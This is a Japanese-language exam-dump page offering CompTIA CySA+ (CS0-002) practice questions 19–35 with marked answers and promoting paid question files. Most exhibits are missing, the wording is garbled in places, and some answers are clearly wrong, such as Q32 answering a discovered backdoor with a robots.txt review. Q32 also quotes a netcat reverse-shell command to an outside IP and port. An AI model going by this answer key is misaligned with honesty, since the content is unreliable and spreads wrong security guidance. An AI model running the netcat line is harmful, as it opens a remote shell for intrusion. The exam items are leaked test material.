最新のCS0-002試験問題集でCompTIA試験にはトレーニングを提供しています [Q19-Q35]

Share

最新のCS0-002試験問題集でCompTIA試験にはトレーニングを提供しています

合格できるCompTIA CompTIA Cybersecurity Analyst (CySA+) Certification ExamのPDF問題集は最近更新された327問あります


CompTIA CS0-002 認定試験の出題範囲:

トピック出題範囲
トピック 1
  • フレームワーク、ポリシー、手順、および制御の重要性を説明する
  • シナリオを前提として、攻撃とソフトウェアの脆弱性を軽減するための制御を実装する
トピック 2
  • インシデント対応プロセスの重要性を説明する
  • クラウドでの運用に関連する脅威と脆弱性を説明する
トピック 3
  • シナリオを前提として、組織のリスク軽減をサポートするセキュリティの概念を適用します
  • 脅威データとインテリジェンスの重要性を説明します
トピック 4
  • 自動化の概念とテクノロジーを比較対照する
  • ハードウェアとソフトウェアの保証のベストプラクティスを説明する
トピック 5
  • クラウドでの運用に関連する脅威と脆弱性を説明する
  • シナリオを前提として、一般的な脆弱性評価ツールからの出力を分析する
トピック 6
  • ソフトウェア保証のベストプラクティスを説明する
  • セキュリティ監視アクティビティの一部としてデータを分析する
  • シナリオを前提として、脆弱性管理アクティビティを実行する
トピック 7
  • シナリオを前提として、既存のコントロールに構成変更を実装してセキュリティを向上させます
  • 特殊なテクノロジーに関連する脅威と脆弱性を説明します

 

質問 19
A security analyst is reviewing the following log from an email security service.

Which of the following BEST describes the reason why the email was blocked?

  • A. The From address is invalid.
  • B. The email originated from the www.spamfilter.org URL.
  • C. The IP address and the remote server name are the same.
  • D. The IP address was blacklisted.
  • E. The To address is invalid.

正解: D

 

質問 20
A company has been a victim of multiple volumetric DoS attacks. Packet analysis of the offending traffic shows the following:

Which of the following mitigation techniques is MOST effective against the above attack?

  • A. The company should enable the DoS resource starvation protection feature of the gateway NIPS.
  • B. The company should implement a network-based sinkhole to drop all traffic coming from
    192.168.1.1 at their gateway router.
  • C. The company should implement the following ACL at their gateway firewall:DENY IP HOST
    192.168.1.1 170.43.30.0/24.
  • D. The company should contact the upstream ISP and ask that RFC1918 traffic be dropped.

正解: D

 

質問 21
Hotspot Question
A security analyst suspects that a workstation may be beaconing to a command and control server.
You must inspect the logs from the company's web proxy server and the firewall to determine the best course of action to take in order to neutralize the threat with minimum impact to the organization.
Instructions:
If at any time you would like to bring back the initial state of the simulation, please select the Reset button.
When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.

正解:

解説:

 

質問 22
A cybersecurity analyst is currently using Nessus to scan several FTP servers. Upon receiving the results of the scan, the analyst needs to further test to verify that the vulnerability found exists.
The analyst uses the following snippet of code:

Which of the following vulnerabilities is the analyst checking for?

  • A. Buffer overflow
  • B. SQL injection
  • C. Format string attack
  • D. Default passwords

正解: B

 

質問 23
A company's modem response team is handling a threat that was identified on the network Security analysts have as at remote sites. Which of the following is the MOST appropriate next step in the incident response plan?

  • A. Enable web server containerization
  • B. Deploy virtual firewalls
  • C. Quarantine the web server
  • D. Capture a forensic image of the memory and disk

正解: B

 

質問 24
A security analyst is performing a review of Active Directory and discovers two new user accounts in the accounting department. Neither of the users has elevated permissions, but accounts in the group are given access to the company's sensitive financial management application by default.
Which of the following is the BEST course of action?

  • A. Monitor the outbound traffic from the application for signs of data exfiltration
  • B. Follow the incident response plan for the introduction of new accounts
  • C. Disable the user accounts
  • D. Confirm the accounts are valid and ensure role-based permissions are appropriate
  • E. Remove the accounts' access privileges to the sensitive application

正解: D

 

質問 25
During a routine network scan, a security administrator discovered an unidentified service running on a new embedded and unmanaged HVAC controller, which is used to monitor the company's datacenter:

The enterprise monitoring service requires SNMP and SNMPTRAP connectivity to operate.
Which of the following should the security administrator implement to harden the system?

  • A. Patch and restart the unknown service.
  • B. Implement SNMPv3 to secure communication.
  • C. Disable the unidentified service on the controller.
  • D. Segment and firewall the controller's network.
  • E. Disable TCP/UDP ports 161 through 163.

正解: A

 

質問 26
A security analyst reviews SIEM logs and detects a well-known malicious executable running in a Windows machine The up-to-date antivirus cannot detect the malicious executable Which of the following is the MOST likely cause of this issue?

  • A. The antivirus does not have the mltware's signature.
  • B. The malware is being executed with administrative privileges.
  • C. The malware is fileless and exists only in physical memory.
  • D. The malware detects and prevents its own execution in a virtual environment.

正解: C

 

質問 27
A security analyst is reviewing packet captures from a system that was compromised. The system was already isolated from the network, but it did have network access for a few hours after being compromised. When viewing the capture in a packet analyzer, the analyst sees the following:

Which of the following can the analyst conclude?

  • A. Malware is attempting to beacon to 128.50.100.3.
  • B. The system is running a DoS attack against ajgidwle.com.
  • C. Data is being exfiltrated over DNS.
  • D. The system is scanning ajgidwle.com for PII.

正解: C

 

質問 28
Which of the following are essential components within the rules of engagement for a penetration test? (Select TWO).

  • A. Payment terms
  • B. Authorization
  • C. Schedule
  • D. Business justification
  • E. List of system administrators

正解: B,C

 

質問 29
A security analyst is attempting to utilize the blowing threat intelligence for developing detection capabilities:

In which of the following phases is this APT MOST likely to leave discoverable artifacts?

  • A. Defensive evasion
  • B. Data collection/exfiltration
  • C. Lateral movement
  • D. Reconnaissance

正解: B

 

質問 30
A security analyst on the threat-hunting team has developed a list of unneeded, benign services that are currently running as part of the standard OS deployment for workstations. The analyst will provide this list to the operations team to create a policy that will automatically disable the services for all workstations in the organization.
Which of the following BEST describes the security analyst's goal?

  • A. To create a system baseline
  • B. To improve malware detection
  • C. To optimize system performance
  • D. To reduce the attack surface

正解: D

 

質問 31
Understanding attack vectors and integrating intelligence sources are important components of:

  • A. a vulnerability management plan.
  • B. proactive threat hunting
  • C. risk management compliance.
  • D. an incident response plan.

正解: C

 

質問 32
A security analyst is investigating the possible compromise of a production server for the company's public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

In some of the portal's startup command files, the following command appears:
nc -o /bin/sh 72.14.1.36 4444
Investigating further, the analyst runs Netstat and obtains the following output

Which of the following is the best step for the analyst to take NEXT?

  • A. Recommend training to avoid mistakes in production command files
  • B. Delete the unknown files from the production servers
  • C. Initiate the security incident response process
  • D. Patch a new vulnerability that has been discovered
  • E. Manually review the robots .txt file for errors

正解: E

 

質問 33
After receiving reports latency, a security analyst performs an Nmap scan and observes the following output:

Which of the following suggests the system that produced output was compromised?

  • A. MySQL services is identified on a standard PostgreSQL port.
  • B. Secure shell is operating of compromise on this system.
  • C. Standard HTP is open on the system and should be closed.
  • D. There are no indicators of compromise on this system.

正解: D

 

質問 34
Risk management wants IT to implement a solution that will permit an analyst to intercept, execute, and analyze potentially malicious files that are downloaded from the Internet.
Which of the following would BEST provide this solution?

  • A. Risk evaluation
  • B. File fingerprinting
  • C. Sandboxing
  • D. Decomposition of malware

正解: C

 

質問 35
......

更新されたテストエンジン練習CS0-002問題集と練習試験で使おう:https://jp.fast2test.com/CS0-002-premium-file.html

問題集お試しセットCS0-002テストエンジン問題集トレーニングには327問あります:https://drive.google.com/open?id=1APtVPIhBYhMLmPRfun4PFdlLyG5974J3


弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

我々の働いている時間: ( GMT 0:00-15:00 )
月曜日から土曜日まで

サポート: 現在連絡 

English Deutsch 繁体中文 한국어